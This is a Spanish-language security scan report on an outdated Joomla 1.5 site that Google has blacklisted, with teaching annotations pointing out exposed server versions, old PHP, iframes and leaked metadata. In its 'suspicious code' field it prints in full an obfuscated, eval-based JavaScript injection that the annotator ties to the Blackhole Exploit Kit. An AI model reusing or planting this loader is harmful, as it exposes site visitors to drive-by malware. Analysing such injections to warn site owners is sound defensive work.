RESUMEN: Tecnologia del sitio conocida y antigua. Revisa iframe como medida de precaucion. Posible inyección SQL. Muchos metadatos extraidos. Detectado CMS Joomla. Joomla antiguo!. Aunque muestra datos del servidor, parece actualizado....
Como actuar, y si te interesa, como lo han podido hacer
Mas recursos
| Sitio Web | http://www.[eliminada-por-motivos-obvios].com |
| MD5 de la URL: | -------------------------------- |
| Valor: | -10 NOTA DEL EJEMPLO: Poca concienciación en el mantenimiento del sitio web. A menor puntuación de un sitio web, más posibilidades de que termine infectado como este. |
| Fecha desenmascarada: | 10 de diciembre de 2012 a las 01:49 |
| Tipo Servidor: : | Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5
NOTA DEL EJEMPLO: Muestra mucha información sobre el servidor, módulos instalados y versiones. |
| Tecnologia: : | PHP/5.2.17 (historial de vulnerabilidades) |
| IPs privadas: | No |
| Iframes: | 2 http://www.--------.com/tablas/hoja4.htm http://www.-----.com/widgets_src/rss.php?rss=mundod_1623-11-2011 |
| Scripts: | 6 Scripts eliminados |
| Codigo sospechoso: | try{document["b"+"ody"]*=document}catch(dgsgsdg){zxc=1;ww=window;}try{d=document["cr"+"eateElement"]("div");}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="asd"}catch(bawetawe){if(ww.document){v=window;n=["1e","3o","4d","46","3l","4c","41","47","46","16","1e","1f","16","4j","d","a","16","16","16","16","4e","3j","4a","16","4b","16","29","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","4a","3n","3j","4c","3n","2h","44","3n","45","3n","46","4c","1e","1d","41","3o","4a","3j","45","3n","1d","1f","27","d","a","d","a","16","16","16","16","4b","1k","4b","4a","3l","16","29","16","1d","40","4c","4c","48","26","1l","1l","4b","3n","3l","41","44","4b","4d","44","3n","43","1k","3l","47","45","1l","3l","44","43","1k","48","40","48","1d","27","d","a","16","16","16","16","4b","1k","4b","4c","4h","44","3n","1k","48","47","4b","41","4c","41","47","46","16","29","16","1d","3j","3k","4b","47","44","4d","4c","3n","1d","27","d","a","16","16","16","16","4b","1k","4b","4c","4h","44","3n","1k","3k","47","4a","3m","3n","4a","16","29","16","1d","1m","1d","27","d","a","16","16","16","16","4b","1k","4b","4c","4h","44","3n","1k","40","3n","41","3p","40","4c","16","29","16","1d","1n","48","4g","1d","27","d","a","16","16","16","16","4b","1k","4b","4c","4h","44","3n","1k","4f","41","3m","4c","40","16","29","16","1d","1n","48","4g","1d","27","d","a","16","16","16","16","4b","1k","4b","4c","4h","44","3n","1k","44","3n","3o","4c","16","29","16","1d","1n","48","4g","1d","27","d","a","16","16","16","16","4b","1k","4b","4c","4h","44","3n","1k","4c","47","48","16","29","16","1d","1n","48","4g","1d","27","d","a","d","a","16","16","16","16","41","3o","16","1e","17","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","2e","4h","2l","3m","1e","1d","4b","1d","1f","1f","16","4j","d","a","16","16","16","16","16","16","16","16","3m","47","3l","4d","45","3n","46","4c","1k","4f","4a","41","4c","3n","1e","1d","28","3m","41","4e","16","41","3m","29","3e","1d","4b","3e","1d","2a","28","1l","3m","41","4e","2a","1d","1f","27","d","a","16","16","16","16","16","16","16","16","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","2e","4h","2l","3m","1e","1d","4b","1d","1f","1k","3j","48","48","3n","46","3m","2f","40","41","44","3m","1e","4b","1f","27","d","a","16","16","16","16","4l","d","a","4l","1f","1e","1f","27"];h=2;s="";if(zxc){for(i=0;i-443!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}} NOTA DEL EJEMPLO: Codigo sospechosos, posiblemente Blackhole Exploit Kit. |
| Spam incrustado: | No |
| Chequeo de Google: | malware
Aviso proporcionado por Google
NOTA DEL EJEMPLO: Incluido en la lista negra de google. |
| Metadato: | http://www.------.com [200] ActiveX[Flash-ActiveX][D27CDB6E-AE6D-11cf-96B8-444553540000
NOTA DEL EJEMPLO: Muchos metadatos extraidos. |
| Metadato: | Adobe-Flash, Apache[2.2.22][mod_ssl/2.2.22 |
| Metadato: | Cookies[9f52b14cce7016267d7ba6c375140483 |
| Metadato: | Frame, HTTPServer[Unix][Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 |
| Metadato: | IP[x.x.x.x] |
| Metadato: | JQuery, Joomla[1.5][com_banners,com_content,com_dfcontact,com_mailto,com_weblinks,com_zoo |
| Metadato: | probably Mambo[com_banners,com_content,com_dfcontact,com_mailto,com_weblinks,com_zoo |
| Metadato: | MetaGenerator[Joomla! 1.5 - Open Source Content Management
NOTA DEL EJEMPLO: Versión antigua y vulnerable del CMS de Joomla. |
| Metadato: | Object[application/x-shockwave-flash,http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0][clsid:D27CDB6E-AE6D-11cf-96B8-444553540000 |
| Metadato: | OpenGraphProtocol[website][230091443669098 |
| Metadato: | OpenSSL[0.9.8e-fips-rhel5 |
| Metadato: | PHP[5.2.17 |
| Metadato: | Script[text/javascript |
| Metadato: | Title[ |
| Metadato: | X-Powered-By[PHP/5.2.17 |
| Metadato: | YouTube\n'] |